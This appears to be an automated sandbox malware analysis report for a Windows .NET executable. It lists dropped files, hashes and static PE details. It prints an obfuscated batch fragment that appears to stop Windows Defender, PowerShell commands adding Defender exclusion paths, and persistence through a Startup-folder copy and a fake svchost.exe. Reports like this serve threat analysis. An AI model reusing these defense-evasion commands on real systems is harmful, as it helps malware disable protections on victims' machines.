                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.1BWqT5MQ.20210915152050.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.398828126636718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZn/GN0LqDo1Z8eZnZ/GN0LqDo1ZVV4z+zQzjZX/GN0LqDo1ZJ5zAzAzyZx:x13
                                                                                                                  MD5:B15F614B0471F176EFB6F7630773048B
                                                                                                                  SHA1:5F97F115867D89C9FAF09955AEFFD7437F6171C8
                                                                                                                  SHA-256:036E8AF2D6FB9344AD8A6C5560D6C442C1C49C4AA6A5F03B99626E0090C1E809
                                                                                                                  SHA-512:45219D52248094B3CD9876B84881CB082FCADD01350DBF2CFDFB58FEF9F997D113289F8D9B2B274736CA56DE34FCAFE1DEEDE3F420715D2A2E9026DFA17D3964
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152052..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 2196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152052..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152605..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.RiCjU3CB.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.377611337291585
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQAqDo1ZFeZB/GNQAqDo1Zr8vE+vEEvEjZCS/GNQAqDo1ZYGvvE0vE0vEy0:Ob/7GyppT0
                                                                                                                  MD5:F724E4C3720803E5FFA61B24FA414F72
                                                                                                                  SHA1:714A38EDE8D10FE988321DEAB63A668D3F5974E1
                                                                                                                  SHA-256:FBA9CFDE2C292FB013E5A6BB0A962829064FF184E2217646F04B424F5A7EAB7F
                                                                                                                  SHA-512:FE248FDBF57B046939928A0A18E8D2DD32388DA4CED1C95FFF08E03BE4946B38F0CDD27DACC2B517CA007B3CE5B46C3074CE83E554CFF8D4C8A68143955FD1CA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152353..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.Vuu9YzJB.20210915152106.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.375814590595939
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQVqDo1ZFeZ//GNQVqDo1Z+8vE+vEEvEjZz/GNQVqDo1ZyvvE0vE0vE4Z/:jb/9ppH
                                                                                                                  MD5:12E8ED4AD3974E4B99B309DFA27FAC17
                                                                                                                  SHA1:EC930ADCFBBF2717C452557EE84EAD0A8ACB5EAC
                                                                                                                  SHA-256:4087655714E431A4412B1C1C8EF8DCB2A775264A414C07C51DC0B1FD35391756
                                                                                                                  SHA-512:E65945D8F98D94874332F6CC87DE1C06F9B662CF65F557EC4FA2DD6D8393663F11C3CA4F53D8EED990DEC5FC93D678AB5D1D2B408441C2B2106C07D057E4376F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152412..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.cMiMRTOx.20210915152053.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.335036846510616
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZsZ/GN7dqDo1ZOXrSpZF/GN7dqDo1Zfq/m0cm0cm02Zh:g7dyyp
                                                                                                                  MD5:B4CD5A7CB3EC649B1EEB90E0AEDE25E5
                                                                                                                  SHA1:7C495D64F90F7EB2AA89D825B31A57CBD374B09B
                                                                                                                  SHA-256:25BEE175151AD7F1CF6D109F869A899A54B76195D6A1C5AB1874289BACFC4A0B
                                                                                                                  SHA-512:1717BFC21617347521A8A3DC9557006BE29EF9CB7C05ABEF7394318AC91E56BCF662254FBFB86118613A7026B8609386C961228D1702745D129FCF2F747BAAA9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152055..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..Process ID: 1036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152055..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..**********************..Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.fN_Cx1KH.20210915152048.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.399822672423884
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZ7/GN0sqDo1ZUeZs/GN0sqDo1Zu4z+zQzjZn/GN0sqDo1ZZ5zAzAzTZz:n
                                                                                                                  MD5:DB644147D05DC4A8BA2A5AB2513E0EB9
                                                                                                                  SHA1:5E2F506D4A6B09859A9343EB5E3E61D070AAE3CC
                                                                                                                  SHA-256:091C3BB1A1498529A68C6E0AD657CAD90583059454D9FDB09E1CFF292F034388
                                                                                                                  SHA-512:372C164B26DDB4AC73A2E52AABC4AF575BE1E317A17ECEED25F79851C23CBA71228F66AE3880F005C7EB139F9BD9A40B7E449F0E9A506CA43ACFB38EB9E1B2BF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152049..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 2968..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152049..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152400..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.jKue+ViU.20210915152052.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.337268833501308
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZd/GN7zqDo1ZRRpZP/GN7zqDo1ZIq/m0cm0cm0oZP:eyyZ
                                                                                                                  MD5:0089AE0D1D8FA20227C93299693DB26A
                                                                                                                  SHA1:1549B1FAF6E0E6C37425949D8AAF9C92B045E5E9
                                                                                                                  SHA-256:EACCA5E385F835F41A0B3FE5EC2CE7EC5825E15A4584DFC4E5AF697CAA26AA62
                                                                                                                  SHA-512:F1C0FD3769D518A2345A61F0D1F9DD70B46F381E80C1B125AF6A739B6358E0C7D0480040570522D4006CD195D33C9601FC6DBAC5A3749E9743F52C645B2B7A8C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152054..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..Process ID: 5456..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152054..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force..**********************..Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.uTd+oL9Y.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.4003906307965535
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GN0rqDo1ZreZe/GN0rqDo1ZxN4z+zQzjZ1/GN0rqDo1Zw5zAzAzyZN:2g
                                                                                                                  MD5:D0418EEA6E506488A09F65A3AF9623CE
                                                                                                                  SHA1:6C3CB13E6AB71365C568E072F4CBBB1BEE4D6FC3
                                                                                                                  SHA-256:4819856AF3763A3D4CAAEA94B16F94DB7756E08243BF882BE108708D31384186
                                                                                                                  SHA-512:8CEEC55383CFFEE1B21388EBE2762F11424487306174D8EC867038DE5943527A5258AE9A2DEDF351B8806C185A7A0F7B103AD9588EE31F30F05B17A4379A96E5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 6804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152428..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.zLIiz7Tp.20210915152056.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.400612170734219
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZx/GN0NqDo1Z2eZB/GN0NqDo1Zs4z+zQzjZT/GN0NqDo1Zw5zAzAz4Zn:B
                                                                                                                  MD5:FF457E1B47D5AFE9390B49F3317BAA79
                                                                                                                  SHA1:FEDC428467F1FB3D35B3F839596F8B54B5A8EEEA
                                                                                                                  SHA-256:B6BC45334C5760A4A6F68CC2E0CE1C44B85170FB6443712F96B16858908CFD76
                                                                                                                  SHA-512:E9CF0C7EE0AAD3AFEF07A6356085F74361B93E21BE4F4ADE5A9801F6C3084D19B8BD4BB994CCD2C560C1C76F0645AD82DB086F2445172160A2A9D459C22EF983
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 6288..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152058..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152410..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:VknMvPoCXZ.exe
                                                                                                                  File size:780216
                                                                                                                  MD5:0cecfa83ee6ea6dd1de38462bbedf15c
                                                                                                                  SHA1:de4dde34707658d98f50de8cf2a182bf7ded2a45
                                                                                                                  SHA256:a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
                                                                                                                  SHA512:cedfcb1fbbcfc9c0592d346295c1225b926d4c7246a81f98cb4e50007629c4f60deb9c1f8a539c353835d1213f2c291d81996b6f327a27dad38e4b1e4bcedd86
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4be619
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                  Time Stamp:0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
